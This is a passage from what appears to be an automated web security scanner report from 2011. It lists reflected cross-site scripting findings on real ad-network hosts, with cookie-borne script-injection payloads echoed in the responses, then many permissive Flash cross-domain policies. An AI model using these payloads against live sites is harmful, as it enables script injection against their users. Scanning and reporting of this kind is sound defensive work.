User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989ed1063'%3balert(1)//73c0ac01910; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:05 GMT
Connection: close
Set-Cookie: mmpg=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:37:05 GMT
Content-Length: 7736

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
t language="Javascript">CollectiveMedia.createAndAttachAd("cm-35414998_1304955425","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-35414998_1304955425,11f8f328940989ed1063';alert(1)//73c0ac01910&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-35414
...[SNIP]...

2.162. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2833e"><script>alert(1)</script>bf0f8f7e7b1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=2833e"><script>alert(1)</script>bf0f8f7e7b1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=4462/5032; rdk2=0; ses2=12590^2&13549^1&5032^3; csi2=3187892.js^1^1304955417^1304955417&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:28 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:37:28 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:37:28 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^4; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58951; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3164882.js^2^1304954981^1304955448&3187892.js^1^1304955417^1304955417&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:37:28 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1479

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=2833e"><script>alert(1)</script>bf0f8f7e7b1" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

3. Flash cross-domain policy
There are 81 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://a.collective-media.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Mon, 06-Jun-2011 15:36:58 GMT; path=/; domain=.collective-media.net
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

3.2. http://a1.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:17 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.3. http://action.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Set-Cookie: uuid=703ddf34-92af-425c-9096-a1b12a71ff71; path=/; expires=Thu, 08-May-2014 15:39:14 GMT; domain=.mathtag.com
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Mon, 09 May 2011 15:39:14 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

3.4. http://ad.amgdgt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.amgdgt.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "85814f-12e-4871688bd9a00"
Cache-Control: max-age=21600
Expires: Mon, 09 May 2011 19:27:14 GMT
Content-Type: text/xml
Content-Length: 302
Date: Mon, 09 May 2011 15:35:20 GMT
X-Varnish: 1625213256 1625133942
Age: 7680
Via: 1.1 varnish
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

3.5. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 09 May 2011 15:35:02 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.6. http://ads.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:12e5"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:35:08 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.7. http://amch.questionmarket.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:02 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0686c83-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=5, max=977
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.8. http://analytics.newsinc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: analytics.newsinc.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Mon, 09 May 2011 15:37:50 GMT
ETag: "b485279b64cb1:0"
Last-Modified: Tue, 05 Oct 2010 14:38:51 GMT
NDN-Server: Ana03
NDN-SiteVer: 3.0
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 286
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-ht
...[SNIP]...

3.9. http://ar.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:22 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.10. http://assets1.grouponcdn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets1.grouponcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: assets1.grouponcdn.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/xml
Accept-Ranges: bytes
Age: 253988
Date: Mon, 09 May 2011 15:35:37 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

3.11. http://at.amgdgt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Mon, 09 May 2011 21:35:46 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

3.12. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:34:58 GMT
Date: Mon, 09 May 2011 15:34:58 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.13. http://b.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:35:23 GMT
Date: Mon, 09 May 2011 15:35:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.14. http://b3.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 17 Jun 2010 13:44:25 GMT
ETag: "1ff0231-d0-4893a095c6040"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

3.15. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190951000"
Last-Modified: Thu, 15 Jul 2010 10:49:11 GMT
Content-Type: application/xml
Content-Length: 384
Date: Mon, 09 May 2011 15:39:18 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.16. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:51 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.17. http://cache-01.cleanprint.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache-01.cleanprint.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache-01.cleanprint.net

Response

HTTP/1.0 200 OK
Server: None
ETag: "cb-43afa3566b0c0"
Accept-Ranges: bytes
X-Server: FD-02
Vary: Accept-Encoding
Content-Type: application/xml
Content-Language: en
Age: 480
Date: Mon, 09 May 2011 15:37:23 GMT
Last-Modified: Tue, 25 Sep 2007 18:50:19 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.18. http://cdn.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 355
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web101
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

3.19. http://cdn.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.interclick.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:26 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n7 ( iad-agg-n12), rf-ht iad-agg-n12 ( origin>CONN)
ETag: "7b643f1dafecb1:0"
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 15:36:27 GMT
Age: 0
Content-Length: 225
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.20. http://cdn.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:30 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 06 Jan 2011 14:11:13 GMT
ETag: "578002-199-4992e12fda240"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/xml
Cache-Control: private, max-age=31536000
Age: 9996468
Expires: Fri, 13 Jan 2012 22:50:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

3.21. http://cr0.worthathousandwords.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cr0.worthathousandwords.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cr0.worthathousandwords.com

Response

HTTP/1.0 200 OK
Content-Length: 305
Content-Type: text/xml
Last-Modified: Thu, 13 Nov 2008 21:02:53 GMT
Accept-Ranges: bytes
ETag: "4a57df31d345c91:303"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3600
Date: Mon, 09 May 2011 15:38:55 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*"/>
...[SNIP]...

3.22. http://d7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
